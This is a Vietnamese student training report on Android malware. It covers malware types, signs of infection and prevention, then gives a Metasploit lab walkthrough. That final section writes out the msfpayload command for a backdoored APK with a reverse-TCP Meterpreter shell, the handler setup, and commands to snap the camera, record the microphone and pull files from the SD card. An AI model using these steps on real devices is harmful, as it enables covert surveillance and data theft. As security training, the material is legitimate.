16
SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6 1

Bai bao cao 2

Embed Size (px)

DESCRIPTION

Android Malware và cách hack android

Citation preview

Page 1: Bai bao cao 2

SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6

1

Page 2: Bai bao cao 2

SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNGVÀ AN NINH MẠNG QUỐC TẾ ATHENA

BÀI BÁO CÁO 2

ANDROID MALWARE VÀ CÁCH HACK ANDROID

CBHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt

2

Page 3: Bai bao cao 2

SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6

Mục lục1. Malware là gì?....................................................................................................................................3

2. Phân loại.............................................................................................................................................4

3. Dấu hiệu bị nhiễm các phần mềm độc hại.......................................................................................4

4. Loại bỏ phần mềm độc hại từ Android............................................................................................5

5. Một số cách hạn chế lây nhiễm.........................................................................................................5

6. Hack android bằng metasploit trên Kali Linux..............................................................................6

3

Page 4: Bai bao cao 2

SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6

1. Malware là gì?

Malware (phần mềm độc hại) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc và thay đổi các thực thi của hệ điều hành cũng như các chương trình ứng dụng mà không có sự cho phép của người dùng và bằng một cách nào đó mà người dùng nếu không để ý cũng không thể phát hiện được những thay đổi

đó.

Phần mềm độc hại đã xuất hiện từ rất lâu trên những hệ điều hành máy tính như Windows, các máy tính MAC và Linux (ở một mức độ thấp hơn), và bây giờ nó đã trở thành một mối nguy hại không nhỏ cho các thiết bị di động chạy Android. Sự có mặt của Android khiến cho các phần mềm độc hại thêm phần thích thú, tích cực tấn công hơn tới đông đảo người dùng Android. Nói về vấn đề này, Timothy Armstrong, một chuyên gia bảo mật tại Kaspersky Lab, cho biết: “Malware trên Android được phát hiện nhiều hơn hầu như mỗi ngày. Thời gian gần đây, chúng tôi đã phát hiện ra ba nhà phát triển ứng dụng (mà có khi là từ cùng 1 người) với tên gọi MYOURNET, Kingmall2010, we20092020 đã cung cấp các ứng dụng để tải về miễn phí trên Android Market, mà hầu hết các ứng dụng đó đều chứa mã độc”.

4

Page 5: Bai bao cao 2

SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6

Năm 2012 là năm thứ hai cho thấy sự bùng nổ của phần mềm độc hại cho Android. Từ tám chương trình độc hại duy nhất vào tháng 1 năm 2011, tỷ lệ phát hiện trung bình hàng tháng phần mềm độc hại mới tấn công vào Android trong năm 2011 đã lên đến hơn 800 mẫu. Trong năm 2012, Kaspersky Lab đã xác định trung bình 6.300 mẫu phần mềm độc hại trên thiết bị di động mới mỗi tháng. Nhìn chung, trong năm 2012 số lượng mẫu độc hại cho Android được biết đến nhiều tăng hơn tám lần.

2. Phân loại

Đa số các phần mềm độc hại Android có thể được chia thành ba nhóm chính dựa theo chức năng:

- SMS Trojans: bòn rút tài khoản di động của các nạn nhân bằng cách gửi tin nhắn SMS đến các số điện thoại được đánh giá cao.

- Backdoors: cung cấp truy cập trái phép vào smartphone, cài đặt các chương trình độc hại khác hoặc ăn cắp dữ liệu cá nhân của người dùng.

- Cuối cùng là các phần mềm gián điệp nhằm mục tiêu thu thập trái phép dữ liệu cá nhân, chẳng hạn như sổ địa chỉ và mật khẩu (hoặc thậm chí hình ảnh cá nhân).

Trong nửa đầu năm 2012, Backdoors, tin nhắn SMS, Trojans và phần mềm gián điệp chiếm 51% các phần mềm độc hại cho Android mới được phát hiện. Trong bảng xếp hạng Top Ten phần mềm độc hại cho Android đã bị chặn bởi Kaspersky Mobile Security hoặc Kaspersky Tablet Security, SMS Trojans là phổ biến nhất và các ứng dụng hiển thị quảng cáo không mong muốn cho người sử dụng ở vị trí thứ hai. Ít phổ biến rộng rãi nhưng nguy hiểm nhất là Trojans ngân hàng trên di động thường xuyên làm việc kết hợp với các máy tính để bàn, ví dụ như Carberp.

Nền tảng Android cho phép cài đặt phần mềm từ các nguồn không tin cậy, và là một trong những cách tốt nhất để đảm bảo sự lây nhiễm từ việc cài đặt các chương trình từ những trang web đáng ngờ. Tuy nhiên, phần mềm độc hại trên nền tảng phân phối ứng dụng chính thức Google Play là một xu hướng bắt đầu vào năm 2011 và tiếp tục trong năm 2012, bất chấp những nỗ lực tốt nhất của Google để làm giảm hoạt động tội phạm mạng. Một trong những ví dụ “khác thường” nhất của phần mềm độc hại trên di động trong năm 2012 là "Find and Call", ứng dụng đã len lỏi được vào Google Play cũng như kho ứng dụng của Apple.

3. Dấu hiệu bị nhiễm các phần mềm độc hại

Cũng giống như trên máy tính, khi bị nhiễm malware, thiết bị Android của bạn sẽ có một số hành động khác thường và bạn không thể thay đổi được bất kỳ điều gì.

- Sử dụng dữ liệu không rõ ràng: có rất nhiều phần mềm độc hại tồn tại để thu thập dữ liệu về tài khoản, số thẻ tín dụng, danh bạ, vv... Một khi có được các thông tin này, nó sẽ tự động được chuyển tiếp về cho người đã tạo ra nó. Và trong nhiều trường hợp, việc chuyển giao thông tin này sẽ dẫn đến sự khác lạ trong sử dụng dữ liệu.

- Hiệu suất của thiết bị kém: tùy thuộc vào thời gian sử dụng và mức độ nghiêm trọng của việc lây nhiễm mà hiệu suất điện thoại của bạn sẽ bị giảm đi nhiều hay ít, đặc biệt là khi bạn đã khởi động lại thiết bị mà các vấn đề không được giảm bớt.

5

Page 6: Bai bao cao 2

SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6

- Thời lượng pin bị giảm: do hầu hết các phần mềm độc hại đều được thiết kế để chạy nền trong hệ thống, nên nó sẽ làm sụt giảm đáng kể thời lượng pin trên thiết bị của bạn.

4. Loại bỏ phần mềm độc hại từ Android

Cách tốt nhất để loại bỏ malware là cài thêm một chương trình chống virus trên thiết bị. Tuy nhiên, bạn hãy cẩn thận và chỉ cài đặt các ứng dụng có tên tuổi được nhiều người sử dụng, nếu không thì bạn sẽ lại rước thêm của nợ về máy. Dưới đây là một số phần mềm miễn phí mà bạn có thể tham khảo:

- Avast! Mobile Security (http://itechnews360.com/avastmobile): chương trình có thể quét toàn bộ ứng dụng trên thiết bị theo lựa chọn của người dùng, hoặc tự động quét theo lịch trình được đặt sẵn. Khi duyệt web, nó sẽ phát hiện và ngăn chặn các liên kết nhiễm malware, giám sát lưu lượng truy cập ra và vào. Bên cạnh đó, nó còn các tính năng tiên tiến khác như chống trộm, tường lửa thông minh và lọc các tin nhắn SMS hoặc cuộc gọi.

- AVG Antivirus Security (http://itechnews360.com/avgsecurity): ứng dụng này sẽ quét tất cả các tập tin mới và các ứng dụng mà nó nghi ngờ, sau đó, cung cấp cho bạn các thiết lập và những lời khuyên để xử lý các lỗ hổng bảo mật. Nó cũng được trang bị thêm một số tính năng tiên tiến khác như giám sát băng thông và các biện pháp chống trộm.

- 360 Mobile Security (http://itechnews360.com/360security): cung cấp các bảo vệ dựa vào cơ sở dữ liệu luôn được cập nhật trên đám mây, giúp bạn phát hiện các lỗ hổng bảo mật và tối ưu hóa các thiết lập tự động. Nhìn chung, đây là chương trình chống virus dễ sử dụng và có giao diện khá đẹp mắt.

5. Một số cách hạn chế lây nhiễm

Cách duy nhất để ngăn chặn phần mềm độc hại là hạn chế tải về các ứng dụng từ bên ngoài Google Play, không cắm thiết bị Android vào máy tính (thay vào đó hãy sử dụng các ứng dụng để biến Android thành ổ đĩa mạng, chẳng hạn như là AirDroid, DroidNAS, vv...), và áp dụng thêm một số mẹo nhỏ dưới đây:

- Kiểm tra đánh giá ứng dụng: khi bạn tìm thấy một ứng dụng mới và muốn cài đặt, điều đầu tiên bạn nên làm là tìm đọc những nhận xét từ những người dùng khác. Qua đó, bạn có thể cảm nhận được phần nào về ứng dụng và đưa ra những quyết định đúng đắn.

- Kiểm tra hồ sơ của nhà phát triển: nếu chưa an tâm với những đánh giá của người dùng, bạn hãy tiếp tục kiểm tra thêm phần hồ sơ của nhà phát triển ứng dụng để xem nó có đáng tin cậy hay không.

- Hãy xem rõ các điều lệ khi cấp quyền cho ứng dụng: khi bấm nút Install để thiết bị bắt đầu tải về và cài đặt, bạn hãy xem rõ toàn bộ các quyền mà ứng dụng yêu cầu, nếu thấy có điều gì đó quá đáng hoặc không hợp lý, hãy ngưng việc cài đặt ngay lập tức. Chẳng hạn như các ứng dụng đọc báo, đọc truyện hay xem tivi mà lại có yêu cầu gửi tin nhắn đi từ điện thoại của bạn là không hợp lý!

- Thường xuyên quét toàn bộ thiết bị: để thực hiện việc này, bạn có thể cài đặt một trong các phần mềm chống virus được giới thiệu bên trên, và hãy quét qua toàn bộ thiết bị mỗi ngày, hoặc ít nhất mỗi tuần một lần.

6

Page 7: Bai bao cao 2

SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6

6. Hack android bằng metasploit trên Kali Linux

Trước tiên chúng ta sẽ tạo ra một backdoor bằng cách dùng lệnh:

msfpayload android/meterpreter/reverse_tcp lhost=192.168.159.128 lport=8080 R > /root/Desktop/app.apk

Trong đó 192.168.159.128 là địa chỉ ip của máy Kali. Chúng ta có thể xem nó bằng cách dùng lệnh:

ifconfig

7

Page 8: Bai bao cao 2

SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6

Và đây là file app.apk mà chúng ta vừa tạo

Tiếp theo chúng ta mở metasploit bằng cách dùng lệnh:

msfconsole

8

Page 9: Bai bao cao 2

SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6

Chúng ta cài đặt các thông số cần thiêt

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.159.128

set lport 8080

Với lhost và lport giống với khi chúng ta tạo file app.apk

Ta mở một cái android ảo và tải về file app.apk, cài đặt và mở lên được giao diện như dưới,

nhấp vào nút Reverse_tcp:

9

Page 10: Bai bao cao 2

SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6

Vậy là ta đã kết nối thành công tới máy android này, ở msfconsole sẽ như sau:

Để xem thông tin về máy, nhập lệnh sysinfo

Sử dụng camera:

Để xem danh sách camera, nhập webcam_list

10

Page 11: Bai bao cao 2

SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6

Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách

camera ở phần trước. Ví dụ như sau:

Ghi âm

Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy

11

Page 12: Bai bao cao 2

SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6

Lấy file từ sd card

Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục

Ta tải file app.apk trong thư mục Download của sdcard

Dùng lệnh cd /sdcard/Download để vào thư mục

12

Page 13: Bai bao cao 2

SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6

Như trên hình, ta thấy 1 file là app.apk, để tải về máy, ta nhập lệnh

download app.apk

Và file này sẽ được tải về thư mục root của máy Kali

Hết

13